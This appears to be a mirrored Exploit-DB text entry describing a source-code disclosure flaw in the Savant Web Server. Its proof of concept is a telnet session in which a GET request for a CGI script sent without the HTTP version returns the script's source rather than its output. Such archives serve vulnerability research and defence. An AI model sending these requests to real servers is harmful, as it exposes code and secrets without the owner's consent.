exploit-db-mirror/exploits/cgi/remote/19995.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

11 lines
No EOL
316 B
Text

source: https://www.securityfocus.com/bid/1313/info
Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script.
telnet target 80
GET /cgi-bin/script.xyz HTTP/1.0
<proper script execution/output>
GET /cgi-bin/script.xyz
<source code displayed>